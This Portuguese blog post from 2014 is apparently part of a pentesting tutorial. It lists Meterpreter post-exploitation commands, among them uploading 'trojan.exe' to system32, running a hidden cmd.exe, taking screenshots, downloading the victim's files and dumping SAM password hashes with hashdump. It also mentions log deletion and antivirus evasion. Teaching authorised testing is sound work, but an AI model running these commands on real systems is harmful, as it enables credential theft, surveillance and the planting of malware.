– root@injetionsec:~#

Alguns Comandos do Meterpreter

09.09.2014 (11:55 am) – Filed under: Pentest ::

8u0j

bem galera em auditorias que faço, sempre quando conseguimos ter acesso ao sistema,tentamos explora-lo para pegar algumas informações sensíveis para poder ver a gravidade da questão.

Vamos falar um pouquinho do meterpreter que é um payload que  e executado depois do processo de exploração,vulnerabilidade de um sistema operacional, meterpreter e o diminutivo de meta-interprete,ele executa completamente na memoria; evitando assim problemas com antivirus,algumas características são:

1. Eliminação de arquivos de logs.
2. Captura de tela.
3. Carga e descarga de arquivos.
4. Copiar informação.
5. Extração de informação e configuração como: tabelas de roteamento, registro do windows, configurações de segurança, compartilhamento de arquivos, configurações de firewall e etc.

COMANDOS

– Background
Executa na sessão atual  um segundo plano para retornar  a linha de do meterpreter, para regressar a  sessão executamos os seguinte comando

meterpreter > sessions –i 1

– Migrate
Permite migrar  o processo para maquina da vitima

meterpreter > migrate [numero processo]

– File Systems Commands
Permite visualizar os arquivos  no diretorio atual el directorio remoto atual

meterpreter > ls

– Download
Permite baixar os arquivos de um diretório da maquina maquina atacada

meterpreter > download c:\\boot.ini

– Upload
Permite enviar um arquivo especifico para a maquina atacada

meterpreter > upload  trojan.exe  c:\\windows\\system32

– Search
Permite buscar arquivos na maquina da vitima

meterpreter > search -f  *.pdf

caso queira apontar para um diretório você vai ter que fazer da seguinte forma

meterpreter > search -d c:\\Users  -f *.pdf

– Comandos de Redes
Podemos usar alguns comandos de rede para ver as informações da rede da maquina atacada

meterpreter > ifconfig
meterpreter > route

– Comando do sistema
Podemos executar alguns comandos do sistemas

meterpreter > execute  -f cmd.exe  -i  -H
esse comando ira mostra o ID do processo criado, juntamente com o fingerprint do sistema operacional

– Getprivs
Permite vermos os privilégios do administrador do sistema

meterpreter > getprivs

– Ps
Permite ver os processos que estão rodando na maquina alvo

meterpreter > ps

– Systeminfo
Permite obter informação dos sistema operacional como
1. Nome da maquina.
2. Sistema Operacional.
3. Tipo de arquitetura.
4. Linguagem do sistema operacional.

meterpreter > systeminfo

COMANDOS DE INTERFACE DE USUARIO

– Enumdesktops
Permite consultar todas as sessão dos computadores

meterpreter > enumdesktops

– Idletime
Permite consultar o tempo que o usuário esta logado no sistema

meterpreter > idletime

– Screenshot
Permite dar um print e ver o que o usuário esta fazendo na tela da maquina

meterpreter > screenshot

– Uictl
Permite controlar alguns componentes do sistema afetado.

meterpreter > uictl

– Hashdump
Permite consultar o que contem dentro da base de dados do arquivo SAM do sistemas windows

meterpreter > hashdump

galera vocês podem ver mais comandos nesse  post feito como um extensão.

ate a próxima =)